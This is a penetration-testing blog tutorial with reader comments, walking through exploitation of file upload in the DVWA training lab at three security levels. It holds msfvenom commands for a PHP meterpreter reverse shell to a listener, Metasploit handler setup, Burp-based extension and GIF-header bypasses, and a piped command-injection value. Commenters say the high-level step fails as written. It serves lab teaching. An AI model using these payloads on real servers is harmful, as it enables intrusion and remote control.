Categories

Archives

Kali Linux, Penetration Testing, Website Hacking

Hack File upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is ‘.jpg’ or ‘.jpeg’ or ’.png’ before allowing the image get uploaded in directory.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.

After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.

hackable/uploads/hack.php

Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium

Same process to create php backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on  upload.

Intercept tab will work to catch post method when you click to upload button.  Now convert raj.php.jpeg into raj.php

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.

This will show the path of uploaded file of the directory where file is successfully uploaded.

hackable/uploads/raj.php

Now repeat the whole process same as in low security to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This’ll provide a meterpreter session 2 when you run URL in browser.

 meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.

Repeat the process to browse shell.jpeg

Again you will get directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php

| copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php

Now repeat the process to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 also.

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

14 thoughts on “Hack File upload Vulnerability in DVWA (Bypass All Security)

  1. The command injection doesn’t work in High security. You’ll get an “ERROR: You have entered an invalid IP” due to input checks.

  2. You are wrong made the last part:

    >> This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability.

    You need to use Null Byte Injection!

  3. This is example how to do it wright:
    http://slides.com/jamesjason/deck-4-4-6-8#/9/2

    If Null Byte not working in your version dvwa you need to use exif for adding php-code in comments, upload image and then use LFI.

    Command injection vulnerability has more dangerous level then file upload, so if you have command injection in server you don’t need anything more 🙂

  4. GIF98 is used to state the file format. Sometimes the server doesn’t check the extension instead check the header of the file. Using GIF98 or GIF98a we can bypass this security.

  5. Sir, I am not able to perform the content type method in DVWA( medium & high), please guide me.
    I tried the method you said also by some other website but why cant I do it.even after changing the content type in burpsuite and then forwarding gives me error ” your image was not uploaded” with warnings everytime.
    show me the correct path if I am missing something or doing wrong.

  6. hello Sir i was trying to upload the file in DVWA i am using windows 10 where i set up the DVWA and i was unable to get the shell ??? what do you think the problem here ? i think i am using 64 bit os and payload is x86 , kindly help

Comments are closed.